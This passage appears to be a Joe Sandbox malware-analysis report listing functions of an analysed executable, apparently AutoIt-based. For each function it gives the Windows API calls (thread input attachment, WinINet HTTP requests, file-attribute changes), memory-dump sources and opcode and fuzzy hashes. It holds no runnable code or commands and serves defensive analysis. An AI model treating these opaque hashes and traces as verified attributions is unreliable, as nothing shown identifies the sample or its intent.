                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2bb81bcf99c96ea2e4882bed5e7567d5611124792d968473168f83b2ff30aeda
                                                                                                                                                                                                                                                                                                    • Instruction ID: de03a3b53207080d5b186b052692e5aba82daebd775d90d91c5732ca8413a78f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bb81bcf99c96ea2e4882bed5e7567d5611124792d968473168f83b2ff30aeda
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C617B75A40248AFDB10DFA4CD81EEE77B8EF4A710F100159FA14AB2E2D7B4A946DB50
                                                                                                                                                                                                                                                                                                    Function 00A7BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A7BB18
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BB2C
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00A7BB33
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BB42
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7BB54
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BB6D
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BB7F
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BBC4
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BBD9
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A7ABA8,?,00000001), ref: 00A7BBE4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7a7549c549e6e6c72fb54b6d479c692461bbc84b00627321121df69bce6c0379
                                                                                                                                                                                                                                                                                                    • Instruction ID: f86545fcab1c644c5a1ef9414f53f00506eb0909060a07807ba6ce4893bd758d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a7549c549e6e6c72fb54b6d479c692461bbc84b00627321121df69bce6c0379
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE318FB1924204AFDB10DF99DCC4F6977ADAB89312F10C015FE0ADB1E4D77899418B74
                                                                                                                                                                                                                                                                                                    Function 00A42FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43007
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4), ref: 00A42D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: GetLastError.KERNEL32(00AE1DC4,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4,00AE1DC4), ref: 00A42D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43013
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4301E
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43029
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43034
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4303F
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4304A
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43055
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43060
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4306E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: edeb564ffe5b4a8698af328531f469c5a9edb16479abecf17ee27bc1eb9ec95c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e152e649ceb9e18bf4666e62862be85ce3591bf0b63839a1e091095511638ae
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: edeb564ffe5b4a8698af328531f469c5a9edb16479abecf17ee27bc1eb9ec95c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5311597A910108BFCB11EF54CA42EDD3B65EF45350BD145A5FA089F122D631DE519B50
                                                                                                                                                                                                                                                                                                    Function 00A12AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A12AF9
                                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00A12B98
                                                                                                                                                                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00A12D7D
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00A53A1B
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00A53A80
                                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A53AAD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                    • Opcode ID: 05ec290cd8fbbacfef14a12663c1c09475badf48a7d504f99ecaa3d164d4e7f5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3ec9f7666e3d9fdefbe378dc0550901b39f339b46988cc9de6c1d2d527cf0b27
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ec290cd8fbbacfef14a12663c1c09475badf48a7d504f99ecaa3d164d4e7f5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DD19C72701212DFCB19EF14C995BA9F7A0BF44781F1142ADE94A6B2A1CB31ED66CF40
                                                                                                                                                                                                                                                                                                    Function 00A88835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A889F2
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88A06
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00A88A30
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A88A4A
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88A5C
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A88AA5
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A88AF5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4b521a1910c09e1fbc0a3ca720e958618b55a3766e291e904c5a0076b3209091
                                                                                                                                                                                                                                                                                                    • Instruction ID: c63dfd0799e641f45b4232b28ad75087d3c2813ed6116f71f0fe600f9ae057d4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b521a1910c09e1fbc0a3ca720e958618b55a3766e291e904c5a0076b3209091
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 898190729043059BCB24FF54C944ABAB3E8BF85350F94481EF895D7291DF38E945CB92
                                                                                                                                                                                                                                                                                                    Function 00A17447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00A174D7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17567: GetClientRect.USER32(?,?), ref: 00A1758D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17567: GetWindowRect.USER32(?,?), ref: 00A175CE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17567: ScreenToClient.USER32(?,?), ref: 00A175F6
                                                                                                                                                                                                                                                                                                    • GetDC.USER32 ref: 00A56083
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A56096
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00A560A4
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00A560B9
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00A560C1
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A56152
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8f77e2078aba3859066b37db0cec273984e2035beefe486ab6f011cd3e2e5b9e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 461b4c19ce9e1b686f9744d6b1dc3e4ac9937fcd5352cdde593cd8a4a3998237
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f77e2078aba3859066b37db0cec273984e2035beefe486ab6f011cd3e2e5b9e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF71A031500205DFCF25CF64CD84AFA7BB5FF49322F148269ED565B2A6D7318889DB50
                                                                                                                                                                                                                                                                                                    Function 00AA955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetCursorPos.USER32(?), ref: 00A119E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: ScreenToClient.USER32(00000000,?), ref: 00A119FE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetAsyncKeyState.USER32(00000001), ref: 00A11A23
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetAsyncKeyState.USER32(00000002), ref: 00A11A3D
                                                                                                                                                                                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00AA95C7
                                                                                                                                                                                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00AA95CD
                                                                                                                                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 00AA95D3
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00AA966E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AA9681
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00AA975B
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                                    • Opcode ID: f76a4fac7b545e08091bb3160270c86b5bf850a3e1b513b391517413ecab7290
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f12cba240b8dc580328aeb4349599878c786fff17d828ec08354933d654c069
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f76a4fac7b545e08091bb3160270c86b5bf850a3e1b513b391517413ecab7290
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1151AD70504340AFDB04EF24CD96FAA77E8FB88714F400A1DF9969B2E2DB709945CB62
                                                                                                                                                                                                                                                                                                    Function 00A8CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8CCB7
                                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A8CCDF
                                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A8CD0F
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A8CD67
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00A8CD7B
                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00A8CD86
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: bfa1d2aa1dbe74d5e83b0b83f1708d6d897e6e962aa379ba7a3c4063adf6a9bc
                                                                                                                                                                                                                                                                                                    • Instruction ID: a3a48c5b6e2eea5ab843b083fba9644eaa86d7f78537cdceee84743c215a03bd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfa1d2aa1dbe74d5e83b0b83f1708d6d897e6e962aa379ba7a3c4063adf6a9bc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD317CB1500208AFD721FFA59D88AAB7BFCEB45750B10452EF48696650DB34ED099BB0
                                                                                                                                                                                                                                                                                                    Function 00A7A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A555AE,?,?,Bad directive syntax error,00AADCD0,00000000,00000010,?,?), ref: 00A7A236
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00A555AE,?), ref: 00A7A23D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A7A301
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                                    • Opcode ID: d215e0086408c2f1699ca3db84d2e4097d5f4faaa13cd870153cc155d31f23d3
                                                                                                                                                                                                                                                                                                    • Instruction ID: 160b5fbfbdcb66b839421a1d84fb65f5deb7ac97e312a9d57c66bcc70b73260b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d215e0086408c2f1699ca3db84d2e4097d5f4faaa13cd870153cc155d31f23d3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4121713284421EFFCF06AFA0CC06EEE7B39BF18300F008465F516A50A2EB719658DB51
                                                                                                                                                                                                                                                                                                    Function 00A729EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00A729F8
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00A72A0D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A72A9A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b6728b233dffce4121d08cf8c744eda7549f5856364257d950545329bf42e88
                                                                                                                                                                                                                                                                                                    • Instruction ID: 02f07a8742f7de6fa54cc8ab47f4e554f5e2da3614ecaee9e6ee7158cf07baaa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b6728b233dffce4121d08cf8c744eda7549f5856364257d950545329bf42e88
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6511E9766C4307B9FB246724DC07EAB37ACDF157A4F20C013F50AE50D1FB61A8414614
